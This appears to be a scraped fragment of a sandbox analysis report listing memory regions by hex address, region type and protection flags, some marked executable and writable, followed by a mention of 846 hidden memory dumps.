page read and write
|
||
2930000
|
unkown
|
page readonly
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
A30000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2F4C000
|
unkown
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
DDE000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
950000
|
unkown
|
page readonly
|
||
362000
|
heap private
|
page read and write
|
||
5E0000
|
unkown
|
page readonly
|
||
9FE000
|
stack
|
page read and write
|
||
284B000
|
unkown
|
page readonly
|
||
2C1000
|
unkown
|
page execute and read and write
|
||
E0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
30E2000
|
unkown
|
page read and write
|
||
212000
|
unkown
|
page read and write
|
||
1E0000
|
heap private
|
page read and write
|
||
1E3000
|
unkown
|
page execute and read and write
|
||
22DE000
|
stack
|
page read and write
|
||
221000
|
unkown
|
page execute and read and write
|
||
293E000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
2910000
|
heap private
|
page read and write
|
||
D40000
|
unkown
|
page readonly
|
||
450000
|
heap private
|
page read and write
|
||
2DE000
|
heap default
|
page read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
4D0000
|
unkown
|
page readonly
|
||
2CBC000
|
unkown
|
page read and write
|
||
D00000
|
unkown
|
page readonly
|
||
2CAE000
|
unkown
|
page read and write
|
||
2EAE000
|
stack
|
page read and write
|
||
740000
|
unkown
|
page readonly
|
||
940000
|
heap private
|
page read and write
|
||
DBF000
|
stack
|
page read and write
|
||
1B352000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
22E0000
|
unkown
|
page readonly
|
||
21D0000
|
heap private
|
page read and write
|
||
5F5000
|
heap default
|
page read and write
|
||
390000
|
unkown
|
page readonly
|
||
770000
|
unkown
|
page readonly
|
||
22E0000
|
heap private
|
page read and write
|
||
20C000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
203000
|
unkown
|
page execute and read and write
|
||
6D0000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
2FE000
|
heap default
|
page read and write
|
||
1B400000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
2B7C000
|
unkown
|
page read and write
|
||
35BA000
|
unkown
|
page read and write
|
||
7FF00230000
|
unkown
|
page read and write
|
||
241000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
2827000
|
unkown
|
page readonly
|
||
5F0000
|
heap default
|
page read and write
|
||
3FE000
|
stack
|
page read and write
|
||
DC0000
|
heap private
|
page read and write
|
||
7FF00042000
|
unkown
|
page execute and read and write
|
||
396000
|
unkown
|
page read and write
|
||
510000
|
unkown
|
page readonly
|
||
AB000
|
stack
|
page read and write
|
||
7FF002B0000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
3B0000
|
heap private
|
page read and write
|
||
2F53000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
29E000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
2D3E000
|
unkown
|
page read and write
|
||
3166000
|
unkown
|
page read and write
|
||
1E20000
|
unkown
|
page write copy
|
||
9AF000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
26C0000
|
unkown
|
page write copy
|
||
25D0000
|
unkown
|
page readonly
|
||
C60000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
There are 846 hidden memdumps, click here to show them.